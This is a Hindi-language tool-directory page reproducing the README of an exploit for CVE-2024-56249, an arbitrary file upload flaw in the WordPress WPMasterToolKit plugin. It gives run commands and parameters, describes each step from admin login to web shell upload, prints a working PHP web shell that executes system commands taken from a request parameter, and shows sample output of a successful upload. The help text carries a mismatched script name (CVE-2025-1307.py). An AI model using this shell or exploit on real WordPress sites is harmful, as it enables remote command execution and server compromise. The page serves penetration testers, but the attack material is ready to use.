Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-56249 — WordPress WPMasterToolKit प्लगइन <= 1.13.1 - मनमाना फ़ाइल अपलोड भेद्यता | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2024-56249
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubnxploited/cve-2024-56249

CVE-2024-56249

WordPress WPMasterToolKit प्लगइन <= 1.13.1 - मनमाना फ़ाइल अपलोड भेद्यता

रिपॉजिटरी देखें
1171 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛠️ WordPress Master Toolkit Exploit (CVE-2024-56249)

🌟 अवलोकन

यह स्क्रिप्ट WordPress WPMasterToolKit प्लगइन में एक आर्बिट्रेरी फ़ाइल अपलोड कमजोरी का शोषण करती है, जिससे हमलावर सर्वर पर एक वेब शेल अपलोड कर सकता है। यह कमजोरी प्लगइन के संस्करण <= 1.13.1 में मौजूद है।

📝 CVE विवरण

  • CVE ID: CVE-2024-56249
  • प्रकाशित: 2025-01-02
  • अद्यतन: 2025-01-02
  • विवरण: Webdeclic WPMasterToolKit में खतरनाक प्रकार की फ़ाइल का असीमित अपलोड, एक वेब सर्वर पर वेब शेल अपलोड करने की अनुमति देता है।
  • CWE: CWE-434: खतरनाक प्रकार की फ़ाइल का असीमित अपलोड
  • CVSS स्कोर: 9.1 (गंभीर)
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

🚀 उपयोग

इस कमजोरी का शोषण करने के लिए निम्नलिखित कमांड का उपयोग करें:

python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>

📋 पैरामीटर

  • -u / --url: लक्ष्य WordPress URL (जैसे, http://192.168.100.74:888/wordpress)
  • -un / --username: WordPress एडमिन उपयोगकर्ता नाम
  • -p / --password: WordPress एडमिन पासवर्ड
  • -fp / --filepath: फ़ाइल अपलोड पथ (डिफ़ॉल्ट: wp-content/uploads/2025/03)
  • -fn / --filename: अपलोड करने के लिए फ़ाइल नाम (डिफ़ॉल्ट: shell.php)

🧩 स्क्रिप्ट स्पष्टीकरण

🔍 1. कमजोरी की जाँच

स्क्रिप्ट WPMasterToolKit प्लगइन के संस्करण की जाँच करके लक्ष्य URL की कमजोरी (CVE-2024-56249) की पुष्टि करती है।

🔑 2. WordPress में प्रमाणीकरण

फिर यह प्रदान किए गए क्रेडेंशियल का उपयोग करके WordPress एडमिन पैनल में लॉग इन करने का प्रयास करती है।

🛡️ 3. सुरक्षा टोकन निकालना

सफल लॉगिन के बाद, स्क्रिप्ट फ़ाइल अपलोड के लिए आवश्यक सुरक्षा टोकन (नॉन्स और टोकन) निकालती है।

📤 4. पेलोड तैनात करना

यह निकाले गए टोकन का उपयोग करके लक्ष्य सर्वर पर निर्दिष्ट फ़ाइल (जैसे, एक वेब शेल) अपलोड करती है।

✅ 5. अपलोड सत्यापित करना

अंत में, स्क्रिप्ट लक्ष्य URL के माध्यम से फ़ाइल की पहुँच की जाँच करके यह सत्यापित करती है कि फ़ाइल सफलतापूर्वक अपलोड हुई है या नहीं।

📂 नोट

सुनिश्चित करें कि शेल फ़ाइल (जैसे, shell.php) स्क्रिप्ट को चलाने से पहले उसी निर्देशिका में रखी गई है। स्क्रिप्ट के लिए फ़ाइल को सफलतापूर्वक ढूँढ़ने और अपलोड करने के लिए यह आवश्यक है।

शेल फ़ाइल का उदाहरण (shell.php)

<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
}
?>

💡 उदाहरण

python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php

🖥️ आउटपुट

python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php

🛠️ स्क्रिप्ट उपयोग

usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]

Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
  -un, --username USERNAME
                        WordPress admin username
  -p, --password PASSWORD
                        WordPress admin password
  -fp, --filepath FILEPATH
                        File upload path (default: wp-content/uploads/2025/03)
  -fn, --filename FILENAME
                        File name to upload (default: shell.php)

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। इसका उपयोग अपने जोखिम पर करें। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।


एक्सप्लॉइट स्क्रिप्ट द्वारा Nxploit | Khaled Alenazi

टूल डाउनलोड करें